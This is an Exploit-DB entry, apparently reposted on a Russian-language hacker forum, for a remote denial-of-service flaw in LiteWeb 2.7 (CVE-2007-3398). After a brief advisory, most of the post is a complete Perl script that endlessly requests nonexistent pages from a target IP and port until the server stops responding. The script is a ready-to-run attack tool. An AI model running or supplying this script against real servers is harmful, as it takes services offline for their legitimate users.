Exploit LiteWEB Web Server 2.7 - Invalid Page Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
30233
Проверка EDB
  1. Пройдено
Автор
PRILI
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2007-3398
Дата публикации
2007-06-25
Код:
source: https://www.securityfocus.com/bid/24628/info

LiteWeb webserver is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying further service to legitimate users.

This issue affects LiteWeb 2.7; other versions may also be vulnerable. 

#!/usr/bin/perl
#GetOpt STD module
use IO::Socket;
use Getopt::Std;
getopts(":i:p:",\%args);
if(defined $args{i}){
$ip = $args{i};
}
if(defined $args{p}){
$port = $args{p};
}
if(!defined $args{i} or !defined $args{p}){
print "-----------------------------------------------------\n";
print "LiteWEB 2.7 404 Denial of Services\n";
print "info: if u send to the server more than 100 requests\nto nonexisting

pages the server will stop to answer\n";
print "Site: http://www.cmfperception.com/liteweb.html\n";
print "Found By Prili - imprili[at]gmail.com\n";
print "Usage: perl $0 -i <ip address> -p <port> \n";
print "-----------------------------------------------------\n";
exit;
}
$protocol = "tcp";
print "try surfing to the web server.\n";
while (1)
{
$request = "GET /AAAAAAA HTTP/1.0 \n\n";
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
                               PeerPort=>$port,
                               Proto=>$protocol,
                               Timeout=>'1') || die "Can't connect to

address!\n";

print $socket $request;
close($socket);
}
 
Источник
www.exploit-db.com

Похожие темы